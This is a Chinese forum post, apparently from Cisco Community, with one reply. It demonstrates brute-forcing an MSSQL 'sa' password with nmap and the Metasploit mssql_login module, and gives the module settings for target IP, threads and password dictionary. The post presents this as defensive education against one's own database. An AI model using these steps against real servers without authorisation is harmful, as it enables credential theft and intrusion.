取消
显示结果 
搜索替代 
您的意思是: 
cancel
2081
查看次数
20
有帮助
1
评论
fortune
VIP Alumni
VIP Alumni
聊安全,简单讲述一个MSSQL 暴力破击攻击,也为做安全的提供点简单的攻防思路。
很多时候攻击者混入内网,第一步就是扫描有价值的信息,我们这里用常用kali, 通过kali自带msf平台对自己的MSSQL数据库进行暴力破解攻击,最终获取真实密码。
第一步: nmap 扫描可用信息
231305d9o8ur4v5hx98hot.jpg
Nmap扫描有使用1433 端口的主机,猜测是MSSQL,开始针对性尝试攻击

第二步:查找MSSQL 可用攻击工具
231306wshv2n8e7srevzkk.jpg
231306l5sdrkyszaaz2zd4.jpg
search mssql

使用MSSQL_login 攻击
231306fw9h5hwor55c9frz.jpg
use auxiliary/scanner/mssql/mssql_login

第三步:
showoption 查看参数,填写必填项目,增加字典
231306crofao3bkcof3a6i.jpg
231307svdh446d43jn68pi.jpg
set rhosts 10.10.100.139 配置目标攻击主机IPset threads 10 设置扫描线程(加速)set PASS_FILE /home/pass1.txt 配置使用字典路径set USERNAME sa 配置常用MSSQL 账号

因为一般情况下MSSQL 默认账户都是SA ,所以配置上去,主机IP 已经扫描出来了

第四步: run
231824tffkf47bb0k0bso6.jpg

当然这里有人说了,这里密码破解是不是太容易了,这里只是演示效果啊,还是很多弱密码的情况,可以用字典生成器生成X位的字典;

懂套路才懂防护,希望对大家有所帮助。

评论
one2
Level 7
Level 7
谢谢版主分享,好东西,咨询一下有什么好的字典生成工具呢?
入门指南

使用上面的搜索栏输入关键字、短语或问题,搜索问题的答案。

我们希望您在这里的旅程尽可能顺利,因此这里有一些链接可以帮助您快速熟悉思科社区:









快捷链接